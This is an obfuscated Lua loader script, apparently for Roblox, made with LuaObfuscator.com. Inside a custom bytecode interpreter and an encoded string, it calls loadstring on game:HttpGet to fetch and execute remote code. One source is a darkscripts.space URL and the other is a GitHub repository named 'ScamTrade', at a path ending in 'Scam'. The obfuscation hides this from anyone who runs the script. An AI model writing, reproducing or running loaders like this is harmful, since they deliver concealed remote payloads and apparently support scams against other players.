--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v81=0;local v82;while true do if (v81==0) then v82=v2(v0(v30,16));if v19 then local v107=v5(v82,v19);v19=nil;return v107;else return v82;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v83=(v31/((5 -(1 + 2))^(v32-(2 -1))))%(2^(((v33-((958 -(892 + 65)) -0)) -(v32-(1 + 0))) + (2 -1))) ;return v83-(v83%(620 -(555 + 64))) ;else local v84=931 -(857 + 74) ;local v85;while true do if (v84==(568 -(367 + 201))) then v85=2^(v32-(118 -(32 + 85))) ;return (((v31%(v85 + v85))>=v85) and ((2213 -1285) -(214 + 713))) or (0 + 0) ;end end end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35=(0 -0) -0 ;local v36;local v37;while true do if (v35==(1 -0)) then return (v37 * (606 -(87 + 263))) + v36 ;end if (v35==0) then v36,v37=v1(v16,v18,v18 + (182 -(67 + 113)) );v18=v18 + 2 ;v35=1 + 0 + 0 ;end end end local function v23() local v38=(1187 -(1069 + 118)) -0 ;local v39;local v40;local v41;local v42;while true do if (v38==(953 -(802 + 150))) then return (v42 * ((102477546 -57307606) -28392724)) + (v41 * (118879 -(116686 -63343))) + (v40 * (187 + 12 + 57)) + v39 ;end if (v38==(997 -(915 + 82))) then v39,v40,v41,v42=v1(v16,v18,v18 + (8 -(8 -3)) );v18=v18 + 3 + 1 ;v38=1 -0 ;end end end local function v24() local v43=0;local v44;local v45;local v46;local v47;local v48;local v49;while true do if ((2 + 0)==v43) then v48=v20(v45,21,822 -(368 + 423) );v49=((v20(v45,100 -68 )==(19 -(10 + 8))) and  -(3 -2)) or (886 -(261 + 624)) ;v43=445 -(416 + 26) ;end if (v43==(3 -(3 -1))) then v46=(1081 -(1020 + 60)) + (1423 -(630 + 793)) ;v47=(v20(v45,1 -0 ,458 -((491 -346) + 293) ) * ((432 -(44 + 386))^((7187 -5669) -(998 + 488)))) + v44 ;v43=1 + 1 ;end if (v43==(2 + 1 + 0)) then if (v48==(772 -(201 + 571))) then if (v47==(1138 -(116 + 1022))) then return v49 * (0 -0) ;else local v108=0 + 0 ;while true do if (v108==(0 -(0 -0))) then v48=1;v46=0 -0 ;break;end end end elseif (v48==(2906 -(814 + 45))) then return ((v47==0) and (v49 * (1/(0 -0)))) or (v49 * NaN) ;end return v8(v49,v48-(56 + 967) ) * (v46 + (v47/((1 + 1)^(1799 -(760 + 987))))) ;end if (v43==0) then v44=v23();v45=v23();v43=1;end end end local function v25(v50) local v51=1913 -(1789 + 124) ;local v52;local v53;while true do if (v51==(766 -((2292 -1547) + 21))) then v52=nil;if  not v50 then local v104=0 + 0 ;while true do if (v104==(0 -0)) then v50=v23();if (v50==(0 -0)) then return "";end break;end end end v51=2 -1 ;end if ((1414 -(447 + 277 + 689))==v51) then v52=v3(v16,v18,(v18 + v50) -1 );v18=v18 + v50 ;v51=(15 -8) -(19 -(9 + 5)) ;end if (v51==(1 + 1)) then v53={};for v92=1 + 0 , #v52 do v53[v92]=v2(v1(v3(v52,v92,v92)));end v51=704 -(376 + 325) ;end if (v51==(4 -1)) then return v6(v53);end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v54=(function() return 0;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();local v59=(function() return;end)();local v60=(function() return;end)();while true do if (v54== #":") then local v88=(function() return 0 + 0 ;end)();local v89=(function() return;end)();while true do if (0==v88) then v89=(function() return 0;end)();while true do if (1~=v89) then else for v112= #".",v59 do local v113=(function() return 0;end)();local v114=(function() return;end)();local v115=(function() return;end)();local v116=(function() return;end)();while true do if (v113==(1636 -(1373 + 263))) then v114=(function() return 1000 -(451 + 549) ;end)();v115=(function() return nil;end)();v113=(function() return 1;end)();end if (v113~=(1 + 0)) then else v116=(function() return nil;end)();while true do if (v114==(1 -0)) then if (v115== #"!") then v116=(function() return v21()~=(0 -0) ;end)();elseif (v115==2) then v116=(function() return v24();end)();elseif (v115~= #"nil") then else v116=(function() return v25();end)();end v60[v112]=(function() return v116;end)();break;end if (v114==0) then local v165=(function() return 0;end)();while true do if (v165~=1) then else v114=(function() return 1385 -(746 + 638) ;end)();break;end if (v165==(0 + 0)) then v115=(function() return v21();end)();v116=(function() return nil;end)();v165=(function() return 1;end)();end end end end break;end end end v58[ #"91("]=(function() return v21();end)();v89=(function() return 2 -0 ;end)();end if (v89~=2) then else v54=(function() return 343 -(218 + 123) ;end)();break;end if (v89~=(1581 -(1535 + 46))) then else v59=(function() return v23();end)();v60=(function() return {};end)();v89=(function() return 1;end)();end end break;end end end if (v54==(2 + 0)) then for v94= #".",v23() do local v95=(function() return 0;end)();local v96=(function() return;end)();local v97=(function() return;end)();while true do if (v95~=(1 + 0)) then else while true do if (v96==0) then v97=(function() return v21();end)();if (v20(v97, #"]", #"|")==0) then local v117=(function() return 560 -(306 + 254) ;end)();local v118=(function() return;end)();local v119=(function() return;end)();local v120=(function() return;end)();while true do if (0==v117) then local v141=(function() return 0 + 0 ;end)();while true do if (v141~=1) then else v117=(function() return 1;end)();break;end if (0==v141) then v118=(function() return v20(v97,2, #"gha");end)();v119=(function() return v20(v97, #"asd1",11 -5 );end)();v141=(function() return 1;end)();end end end if (3==v117) then if (v20(v119, #"xxx", #"xnx")== #"}") then v120[ #"0836"]=(function() return v60[v120[ #"asd1"]];end)();end v55[v94]=(function() return v120;end)();break;end if (v117~=(1468 -(899 + 568))) then else local v143=(function() return 0;end)();local v144=(function() return;end)();while true do if (v143==(0 + 0)) then v144=(function() return 0 -0 ;end)();while true do if (v144==(604 -(268 + 335))) then v117=(function() return 292 -(60 + 230) ;end)();break;end if ((572 -(426 + 146))~=v144) then else v120=(function() return {v22(),v22(),nil,nil};end)();if (v118==0) then local v182=(function() return 0;end)();local v183=(function() return;end)();while true do if (v182~=0) then else v183=(function() return 0 + 0 ;end)();while true do if (v183~=0) then else v120[ #"xnx"]=(function() return v22();end)();v120[ #"0313"]=(function() return v22();end)();break;end end break;end end elseif (v118== #",") then v120[ #"gha"]=(function() return v23();end)();elseif (v118==(1458 -(282 + 1174))) then v120[ #"gha"]=(function() return v23() -(2^16) ;end)();elseif (v118~= #"nil") then else local v188=(function() return 811 -(569 + 242) ;end)();local v189=(function() return;end)();while true do if (v188~=0) then else v189=(function() return 0 -0 ;end)();while true do if (0==v189) then v120[ #"91("]=(function() return v23() -(2^(1 + 15)) ;end)();v120[ #"http"]=(function() return v22();end)();break;end end break;end end end v144=(function() return 1;end)();end end break;end end end if (2==v117) then if (v20(v119, #"|", #"|")~= #"\\") then else v120[1026 -(706 + 318) ]=(function() return v60[v120[2]];end)();end if (v20(v119,2,2)~= #"[") then else v120[ #"19("]=(function() return v60[v120[ #"-19"]];end)();end v117=(function() return 1254 -(721 + 530) ;end)();end end end break;end end break;end if ((1271 -(945 + 326))~=v95) then else local v109=(function() return 0 -0 ;end)();local v110=(function() return;end)();while true do if (v109~=(0 + 0)) then else v110=(function() return 700 -(271 + 429) ;end)();while true do if (v110==(1 + 0)) then v95=(function() return 1;end)();break;end if (v110~=0) then else v96=(function() return 1500 -(1408 + 92) ;end)();v97=(function() return nil;end)();v110=(function() return 1087 -(461 + 625) ;end)();end end break;end end end end end for v98= #"/",v23() do v56[v98-#" " ]=(function() return v28();end)();end return v58;end if (v54~=0) then else local v90=(function() return 1288 -(993 + 295) ;end)();local v91=(function() return;end)();while true do if (v90==(0 + 0)) then v91=(function() return 1171 -(418 + 753) ;end)();while true do if (v91~=(1 + 1)) then else v54=(function() return  #"<";end)();break;end if (v91~=0) then else v55=(function() return {};end)();v56=(function() return {};end)();v91=(function() return 1 + 0 ;end)();end if (v91==1) then v57=(function() return {};end)();v58=(function() return {v55,v56,nil,v57};end)();v91=(function() return 1 + 1 ;end)();end end break;end end end end end local function v29(v61,v62,v63) local v64=v61[1];local v65=v61[531 -(406 + 123) ];local v66=v61[1772 -(1749 + 20) ];return function(...) local v67=v64;local v68=v65;local v69=v66;local v70=v27;local v71=1 + (0 -0) ;local v72= -(1323 -(1249 + (216 -143)));local v73={};local v74={...};local v75=v12("#",...) -(1146 -(458 + 8 + (1490 -811))) ;local v76={};local v77={};for v86=0 + 0 ,v75 do if (v86>=v69) then v73[v86-v69 ]=v74[v86 + (2 -1) ];else v77[v86]=v74[v86 + (2 -1) ];end end local v78=(v75-v69) + 1 + 0 ;local v79;local v80;while true do local v87=1900 -(106 + 1794) ;while true do if (v87==((0 -0) + 0)) then v79=v67[v71];v80=v79[1 + 0 ];v87=2 -1 ;end if ((v87==(2 -1)) or (294>=4831)) then if (v80<=((11 + 113) -((1694 -(1121 + 569)) + 110))) then if (v80<=((949 -(22 + 192)) -(476 + 255))) then if (v80<=(1131 -(369 + 761))) then if (v80>(0 + 0)) then local v121=v79[586 -(57 + 527) ];local v122=v77[v79[1430 -(41 + 1386) ]];v77[v121 + ((267 -163) -((40 -23) + 86)) ]=v122;v77[v121]=v122[v79[1 + 2 + 1 ]];else local v126=0 -0 ;local v127;while true do if (v126==(0 -0)) then v127=v79[168 -((805 -(483 + 200)) + 44) ];v77[v127]=v77[v127](v13(v77,v127 + (1 -0) ,v72));break;end end end elseif (v80<=(6 -(1467 -(1404 + 59)))) then v71=v79[3 + 0 ];elseif (v80==(1 + 2)) then for v168=v79[3 -(2 -1) ],v79[3 + (0 -0) ] do v77[v168]=nil;end else v77[v79[67 -(30 + 35) ]]=v79[3 + 0 ];end elseif (v80<=(1264 -(1043 + 214))) then if (v80<=((13 + 5) -13)) then v77[v79[2]]=v79[8 -5 ]~=((632 + 580) -(323 + 889)) ;elseif (v80>(5 + 1)) then local v147=v79[5 -3 ];local v148=v77[v79[2 + 1 ]];v77[v147 + (2 -1) ]=v148;v77[v147]=v148[v79[1937 -(565 + 1368) ]];else v77[v79[7 -5 ]]();end elseif (v80<=8) then v77[v79[582 -(361 + 219) ]]=v63[v79[3 -(0 -0) ]];elseif ((2029<=3084) and (v80==(9 + 0))) then v71=v79[323 -(53 + 267) ];else v77[v79[1 + 1 ]]=v79[4 -1 ]~=(0 -0) ;end elseif ((v80<=(428 -(9 + 6 + (534 -136)))) or (2037==2420)) then if ((4458>3904) and (v80<=(994 -(18 + 964)))) then if (v80==(9 + (767 -(468 + 297)))) then local v132=0 -0 ;local v133;while true do if ((436>=123) and ((0 + 0)==v132)) then v133=v79[(165 -(92 + 71)) + 0 ];v77[v133]=v77[v133](v13(v77,v133 + ((421 + 430) -((33 -13) + 830)) ,v72));break;end end elseif (v77[v79[2 + 0 ]]==v79[130 -(116 + 10) ]) then v71=v71 + 1 + 0 ;else v71=v79[1128 -(936 + 189) ];end elseif ((500<1816) and (v80<=(5 + 8))) then local v134=v79[1615 -(1565 + (610 -(334 + 228))) ];local v135,v136=v70(v77[v134](v13(v77,v134 + (739 -(542 + 196)) ,v79[6 -(768 -(574 + 191)) ])));v72=(v136 + v134) -(268 -(176 + 91)) ;local v137=0 + 0 ;for v138=v134,v72 do v137=v137 + 1 + 0 ;v77[v138]=v135[v137];end elseif ((3574==3574) and (v80==(6 + 8))) then if ((221<390) and (v77[v79[(4 + 0) -2 ]]==v79[9 -(16 -11) ])) then v71=v71 + (1552 -(1126 + 425)) ;else v71=v79[3];end else v77[v79[407 -(118 + 287) ]]=v63[v79[11 -8 ]];end elseif (v80<=(1139 -(118 + 1003))) then if ((v80<=(1034 -(697 + 164 + 157))) or (2213<=1421)) then v77[v79[5 -3 ]]();elseif (v80==(394 -(142 + (544 -309)))) then v77[v79[9 -7 ]]=v79[(1 -0) + 2 ];else for v172=v79[979 -(553 + 424) ],v79[7 -4 ] do v77[v172]=nil;end end elseif ((3058<4860) and (v80<=((354 + 892) -(322 + 905)))) then do return;end elseif (v80>(631 -(602 + 9))) then local v159=0 -(126 -(55 + 71)) ;local v160;local v161;local v162;local v163;while true do if ((2 + 0)==v159) then for v179=v160,v72 do v163=v163 + 1 + 0 ;v77[v179]=v161[v163];end break;end if ((v159==(1 + 0)) or (1296>=4446)) then v72=(v162 + v160) -(948 -((322 -77) + 702)) ;v163=0 + 0 ;v159=(1792 -(573 + 1217)) + 0 ;end if (v159==(0 + 0)) then v160=v79[1900 -(260 + 1638) ];v161,v162=v70(v77[v160](v13(v77,v160 + ((5 -3) -1) ,v79[7 -(1 + 3) ])));v159=1 + (236 -(141 + 95)) ;end end else do return;end end v71=v71 + 1 ;break;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!063Q00028Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q7470476574035D3Q00682Q7470733A2Q2F6461726B736372697074732E73706163652F736372697074732F3533633233322Q612D623164362D34302Q312D613230362D3363372Q38356234326462635F39332Q3633303134393735383231343239362E6C7561034A3Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F53702Q6564584875622F5363616D54726164652F726566732F68656164732F6D61696E2F5363616D001B3Q0012043Q00014Q0012000100013Q00260E3Q0002000100010004023Q00020001001204000100013Q00260E00010005000100010004023Q00050001001208000200023Q001208000300033Q002007000300030004001204000500054Q000A000600014Q0015000300064Q000B00023Q00022Q0006000200010001001208000200023Q001208000300033Q002007000300030004001204000500064Q0015000300054Q000B00023Q00022Q00060002000100010004023Q001A00010004023Q000500010004023Q001A00010004023Q000200012Q00143Q00017Q00",v9(),...);
